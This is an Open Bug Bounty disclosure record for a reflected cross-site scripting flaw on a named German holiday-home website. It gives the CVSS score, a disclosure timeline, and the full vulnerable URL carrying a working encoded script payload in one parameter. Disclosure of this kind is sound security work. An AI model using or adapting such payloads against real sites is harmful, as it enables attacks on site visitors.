frosch-ferienhaus.de XSS vulnerability

2017-11-28T02:41:00
ID OBB:440348
Type openbugbounty
Reporter deb_security
Modified 2018-02-26T02:41:00

Description

Open Bug Bounty ID: OBB-440348

Description| Value
---|---
Affected Website:| frosch-ferienhaus.de
Vulnerable Application:| Custom Code
Vulnerability Type:| XSS (Cross Site Scripting) / CWE-79
CVSSv3 Score:| 6.1 [CVSS:3.0/AV:N/AC:L/PR:N/UI:R/S:C/C:L/I:L/A:N]
Remediation Guide:| OWASP XSS Prevention Cheat Sheet

Vulnerable URL:
https://www.frosch-ferienhaus.de/index.php?id=151&mode;=2&objekt;=%22%3E%3Csvg%3E%3Cscript%3E/%3C@/%3Eprompt(/OPENBUGBOUNTY/)%3C/script%3E&ort2;=&gebiet2;=&region;=&land;=&sql;_sort=(Entfernung,1)&sort;=&Produktlinie;=1&themenids;=6208,6178,4662,7426,7427,7428,7425,7429,7435,7430,7431,7432,4161,936,136,2805,3105,6111,1003,99,104,2342,6442,100,7218,3694,2806,3106,337,874,6746,7069,3447,4615,216,217,615,3722,7319,7325,7326,7327,7328,7329,816,7330,7331,7332,7333,7341,7342,7343,7344,7345,7346,7347,7348,7349,7350,7351,7353,7354,7355,7356,7358,7359,7360,7361,7362,133,4639,7363,7364,7365,7366,4946,7404,4959,4960,220,4162,4961,221,4962,5283,4661,4212,6112,7103,7403,6556,4876,6551,6552,4616,7421,7100,7383,5652,4613,6553,2608,4690,3700,3701,982,3702,833,5757,4160,6737,4159,7083,7323,996,649,3720,357,340,3450,7405&thema;=194&backto;=/index.php?id=682&va;=&Personen;=&Anreisetag;=&Abreisetag;=&KleinKinder;=

Coordinated Disclosure Timeline

Description| Value
---|---
Vulnerability Reported:| 28 November, 2017 02:41 GMT
Vulnerability Verified:| 28 November, 2017 02:44 GMT
Website Operator Notified:| 28 November, 2017 02:44 GMT
Vulnerability Published:| 28 November, 2017 02:44 GMT [without any technical details]
Public Disclosure:| 26 February, 2018 02:41 GMT